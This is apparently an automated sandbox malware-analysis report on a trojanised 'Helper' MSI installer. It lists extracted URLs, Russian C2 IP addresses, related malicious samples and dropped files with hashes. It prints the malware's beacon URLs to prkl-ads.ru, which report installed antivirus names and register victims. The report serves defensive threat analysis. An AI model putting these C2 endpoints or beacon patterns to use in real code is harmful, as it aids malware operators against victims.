                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.404099594.00000000070DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedpowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Replaypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegopowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binarypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingpowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.microsofpowershell.exe, 00000005.00000003.406446885.0000000007144000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://prkl-ads.ru/?status=start&av=$displayNamesStringpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.advancedinstaller.comSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.dr, MSI750A.tmp.1.dr, MSI74BB.tmp.1.dr, MSI7331.tmp.1.dr, MSI6AF5.tmp.0.drfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/trustpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://crls.ssl.coSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Noncepowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Contract/MSValue2ResponseDpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnspowershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://html4/loose.dtdSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		low
                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Renewpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2006/02/addressingidentitypowershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://contoso.com/Licensepowershell.exe, 00000005.00000002.528616904.0000000005B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://ocsps.ssl.com0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeypowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1powershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://tempuri.org/Contract/MSValue1powershell.exe, 00000005.00000002.523653859.0000000004FA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://prkl-ads.rupowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.datacontract.org/2004/07/System.Xmlpowershell.exe, 00000005.00000002.559613303.0000000068728000.00000020.00000001.01000000.0000001A.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://tempuri.org/Contract/MSValue2powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://tempuri.org/Contract/MSValue3powershell.exe, 00000005.00000002.523653859.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.523653859.0000000004FAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://prkl-ads.ru?status=reg&key=llks74638sj&site=Testpowershell.exe, 00000005.00000002.523653859.0000000004BD9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 446fc6.msi.1.dr, Helper.msi.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://.cssSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.392305462.0000000005953000.00000004.00000020.00020000.00000000.sdmp, shi69FA.tmp.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		low
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://tempuri.org/Dpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoorpowershell.exe, 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://ac.ecLRpowershell.exe, 00000005.00000003.507468238.000000000509A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.00000000051FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.507468238.000000000514C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown

                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public IPs

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      81.177.140.69
                                                                                                                                                      		prkl-ads.ruRussian Federation
                                                                                                                                                      		8342RTCOMM-ASRUfalse
                                                                                                                                                      45.135.232.24
                                                                                                                                                      		unknownRussian Federation
                                                                                                                                                      		49392ASBAXETNRUtrue

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:38.0.0 Beryl
                                                                                                                                                      Analysis ID:1294691
                                                                                                                                                      Start date and time:2023-08-21 19:34:08 +02:00
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 14m 13s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample file name:SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal52.troj.spyw.evad.winEXE@11/38@2/2
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 64%
                                                                                                                                                      • Number of executed functions: 162
                                                                                                                                                      • Number of non-executed functions: 125
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Override analysis time to 240s for rundll32

                                                                                                                                                      Warnings

                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.209.48.97
                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, metacookie25c19ec61c.blob.core.windows.net, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com, blob.ams08prdstr10a.store.core.windows.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      19:35:19API Interceptor292x Sleep call for process: powershell.exe modified

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      81.177.140.69scrFE4.ps1Get hashmaliciousUnknownBrowse

                                                                                                                                                        Domains

                                                                                                                                                        No context

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        RTCOMM-ASRU41O3Ng20n4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.177.17.84
                                                                                                                                                        scrFE4.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        frank_v4.ps1Get hashmaliciousRedLineBrowse
                                                                                                                                                        • 81.177.140.194
                                                                                                                                                        rOtpAxzBT7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 213.59.13.180
                                                                                                                                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.176.232.244
                                                                                                                                                        l2UQPm9o6q.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.177.17.33
                                                                                                                                                        https://9sta9rt4.store/?status=reg&key=19.06_ow2hgf&site=NotionGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.194
                                                                                                                                                        SECT_v4.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 195.161.114.3
                                                                                                                                                        dImXBB5Rd4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 213.24.4.242
                                                                                                                                                        96WwSFtZrw.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                        • 195.161.41.198
                                                                                                                                                        armv5l-20230712-1356.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.176.255.15
                                                                                                                                                        x86-20230712-1356.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.176.255.40
                                                                                                                                                        sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.177.17.99
                                                                                                                                                        PXPz45kM78.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 81.176.231.60
                                                                                                                                                        MoEwyGqNDT.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.42.10
                                                                                                                                                        pformbook.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 195.161.62.100
                                                                                                                                                        y0uWRexXtw.exeGet hashmaliciousFormBook, PrivateLoaderBrowse
                                                                                                                                                        • 195.161.62.100
                                                                                                                                                        202385_dated_20.06.2023_-_#U0421PS_Grupp,_LLC.xlsGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 195.161.62.100
                                                                                                                                                        SecuriteInfo.com.Gen.Variant.Nemesis.22803.4515.12611.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 195.161.62.100
                                                                                                                                                        8BOpwaR3lt.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                        • 81.177.143.184

                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9advn.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        yTj0n5qu.posh.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        fa6af7e23ad1d78e2fa4ed2d372a0990a78bcc3a49bbd.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        SCV.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        Photo_Image_Store-MnZ8RD7ic7oBUDadT3RD-22100-17668.batGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        ZI5Fu2nDVe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        EHJ.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        DHL_AWB_2506307661.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        qasx(1).vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        HVS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        #U0395#U03bd#U03c4#U03bf#U03bb#U03ae_#U03b1#U03b3#U03bf#U03c1#U03ac#U03c2.htaGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        Notice_4331860.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        Notice_5595225.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        lnvoice_#72993_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        Informe_Detallado_Reporte_Centrales_2023_08_015_PDF.vbsGet hashmaliciousNjratBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        Invoice_ID.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        file.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        decode_6fda918c8a7ba6982a7080a5eff5f97ec6ec50bea55936e98179f3683aa2c6e5.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        decode_da721f195f41b72d8f2813eaa2c8388786bf5dffe6cbf59633a61a45576273f6.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                                                                                                        • 81.177.140.69
                                                                                                                                                        EGK.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 81.177.140.69

                                                                                                                                                        Dropped Files

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6AF5.tmpNotaFiscal.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                          radarinstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            radarinstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                Danfe2372342.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                  id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                    id-Processo_Z5TGVQUK.msiGet hashmaliciousUnknownBrowse

                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                      C:\Config.Msi\446fc8.rbs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                      Entropy (8bit):5.717485601585273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:dY1TmrWEz6BTmsFTmTx4FTmyTmIJbTmhdPYjED8SMiTm+O:dY1Tc4BTdTG4FTXTB9TudQY7TXO
                                                                                                                                                                      MD5:68AE2D79C50D2BD6B846C7A6C558BE23
                                                                                                                                                                      SHA1:C3D36F85DBB7FD3928AE09CD547B386809FEF8A3
                                                                                                                                                                      SHA-256:7F25FB3745DFA0715A9B4DAB58B818464DA65B691A73CC81B3660DC7D2FF5524
                                                                                                                                                                      SHA-512:8781D2D926E2EB15008F3970A38824E6435914267EFFF1E832BD868DF70B90D664C21BADB212FC85FB3FE71AC439FA9736AAB5A99CAC987EEE27F1A33FD3C29E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...@IXOS.@.....@...W.@.....@.....@.....@.....@.....@......&.{8415BADB-0228-466E-A597-68F06CD8880C}..Helper..Helper.msi.@.....@.....@.....@........&.{3E94FD11-3A35-44C9-B7E5-88560AB9D7CF}.....@.....@.....@.....@.......@.....@.....@.......@......Helper......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{1DAA5F1C-35AF-4DBC-BCD3-B8B55A5E6DC0}&.{8415BADB-0228-466E-A597-68F06CD8880C}.@......&.{96C4647E-D5A3-492E-A70C-151AAE336B85}&.{8415BADB-0228-466E-A597-68F06CD8880C}.@......&.{E50D5DA2-61B1-4DD4-BD53-57A21481EBCF}&.{8415BADB-0228-466E-A597-68F06CD8880C}.@......&.{2E55D07B-CAEF-4B54-92D8-F9199243F537}&.{8415BADB-0228-466E-A597-68F06CD8880C}.@......&.{1DD84FFF-FB01-4836-ABCE-784A825E8F0A}&.{8415BADB-0228-466E-A597-68F06CD8880C}.@........CreateFolders..Creating folders..Folder: [1]#.9.C:\Users\user\AppData\Roaming\Helper Company LLC\Helper\.@........InstallFiles..Copying new files&.File: [1], Dir

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8003
                                                                                                                                                                      Entropy (8bit):4.839308921501875
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                                                                                      MD5:937C6E940577634844311E349BD4614D
                                                                                                                                                                      SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                                                                                                      SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                                                                                                      SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):11072
                                                                                                                                                                      Entropy (8bit):5.899528789162663
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:NzIlyzk340DZ2fdwiyY/M31Gb6icdR9nGJUGXXyf8ORRBqk7L/l:NzIlyo34+AbyUM3D9R9GJUsCfF/B/Tl
                                                                                                                                                                      MD5:51212ED4732EC0863930F54E8F615280
                                                                                                                                                                      SHA1:9510B160C1E2627B162C691B44BDE95CFE8FD1E3
                                                                                                                                                                      SHA-256:125D3A382145CC00E87D480CF93EA3603C9E9F5BC83B7833B5DD5B26E22051F8
                                                                                                                                                                      SHA-512:FA7DE7B014BC4E278216A1405D07BEB1CB2046DD6B276EE1DFBC79A85E25B2902896118F26D9F626D9F0E44CFB6BC1C9CB3BC006ED955A7A17DFF697032D7981
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e...............%...............7................@..........P................./.C..J..%...].n.....%.Microsoft.PowerShell.Commands.Utility...H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices4................ .v'#-N....M..d........System.Xml..8....................@.Z:.h...........System.Numerics.4...................v.A.Z...W.1........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................hr..B.....w.O........System.Configuration<.................&M ..E..;............System.Transactions.D.....................G..H.).7.........System.Configuration.Ins

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI6AF5.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):570784
                                                                                                                                                                      Entropy (8bit):6.450187144191945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:X+Sud3L4YgAc8wjVMeKRtGnm3CCRloVywX9gDAOAVafv5kh4JQCmR+gj:X+SuPgAc8+MjGCCslegDiwX5vOCmR+gj
                                                                                                                                                                      MD5:DB7612F0FD6408D664185CFC81BEF0CB
                                                                                                                                                                      SHA1:19A6334EC00365B4F4E57D387ED885B32AA7C9AA
                                                                                                                                                                      SHA-256:E9E426B679B3EFB233F03C696E997E2DA3402F16A321E954B54454317FCEB240
                                                                                                                                                                      SHA-512:25E129CB22AAABC68C42ECF10BB650AC4D0609B12C08703C780572BAC7ECF4559FCC49CD595C56EA48CF55260A984CFA333C08307FFB7C62268B03FBECC724B9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                      • Filename: NotaFiscal.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: radarinstaller.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: radarinstaller.exe, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Danfe2372342.msi, Detection: malicious, Browse
                                                                                                                                                                      • Filename: Danfe2372342.msi, Detection: malicious, Browse
